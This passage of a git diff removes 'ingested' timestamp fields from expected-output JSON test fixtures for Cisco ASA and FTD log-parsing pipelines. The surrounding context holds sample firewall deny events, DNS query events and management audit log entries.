-19125,7 +18880,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029486354Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19206,7 +18960,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029487359Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19287,7 +19040,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029488397Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -19368,7 +19120,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029489363Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19449,7 +19200,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029490330Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19530,7 +19280,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029491371Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19611,7 +19360,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029492379Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19692,7 +19440,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029493449Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19773,7 +19520,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029494411Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -19854,7 +19600,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029495366Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19935,7 +19680,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029496331Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20016,7 +19760,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029497482Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20097,7 +19840,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029498516Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20178,7 +19920,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029499563Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20259,7 +20000,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029500530Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -20340,7 +20080,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029501499Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20421,7 +20160,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029502465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20502,7 +20240,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029503559Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20583,7 +20320,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029504661Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20664,7 +20400,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029505637Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20745,7 +20480,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029506618Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -20826,7 +20560,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029507589Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20907,7 +20640,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029508564Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json index 3ba16e735fe..1beb7a817a5 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json @@ -84,7 +84,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102284679Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70", "code": "430003", "kind": "event", 
@@ -227,7 +226,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102292760Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -372,7 +370,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102293845Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", 
@@ -515,7 +512,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102294720Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12", "code": "430003", "kind": "event", @@ -660,7 +656,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102295481Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error", "code": "430003", "kind": "event", 
@@ -804,7 +799,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102296211Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658", "code": "430003", "kind": "event", @@ -947,7 +941,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102296960Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", 
@@ -1093,7 +1086,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102297696Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", @@ -1236,7 +1228,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102298431Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", 
@@ -1380,7 +1371,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102299195Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -1525,7 +1515,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102299937Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused", "code": "430003", "kind": "event", 
@@ -1664,7 +1653,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102300866Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure", "code": "430003", "kind": "event", @@ -1805,7 +1793,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102301681Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900", "code": "430003", "kind": "event", 
@@ -1949,7 +1936,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102302506Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694", "code": "430003", "kind": "event", @@ -2092,7 +2078,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102303301Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946", "code": "430003", "kind": "event", 
@@ -2236,7 +2221,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102304063Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -2381,7 +2365,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102304938Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", 
@@ -2524,7 +2507,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102305698Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -2667,7 +2649,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102306437Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", 
@@ -2809,7 +2790,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102307187Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59", "code": "430003", "kind": "event", @@ -2951,7 +2931,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102307941Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json index bd1014bfef8..e281d76290b 100644 
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json @@ -28,7 +28,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.197117196Z", "original": "Jan 1 2019 01:00:27 beats asa[1234]: %FTD-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -72,7 +71,6 @@ }, "event": { "severity": 8, - "ingested": "2021-12-29T10:00:14.197119669Z", "original": "Jan 1 2019 01:00:30 beats asa[1234]: %FTD-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json index 46d0510c120..f6f0a02e1c5 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json @@ -26,7 +26,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593757348Z", "original": "\u003c14\u003eAug 14 2019 13:56:30 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -63,7 +62,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593762198Z", "original": "\u003c14\u003eAug 14 2019 13:57:19 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=Banner, Page View\u0000x0a\u0000x00", "code": "" }, 
@@ -100,7 +98,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593763958Z",
 "original": "\u003c14\u003eAug 14 2019 13:57:26 ChangeReconciliation.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/ChangeReconciliation.cgi, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -137,7 +134,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593765407Z",
 "original": "\u003c14\u003eAug 14 2019 13:57:34 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=IntrusionPolicyPrefs, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -174,7 +170,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593766800Z",
 "original": "\u003c14\u003eAug 14 2019 13:57:43 lights_out_mgmt.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /admin/lights_out_mgmt.cgi, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -211,7 +206,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593772024Z",
 "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View url filtering settings\u0000x0a\u0000x00",
 "code": ""
 },
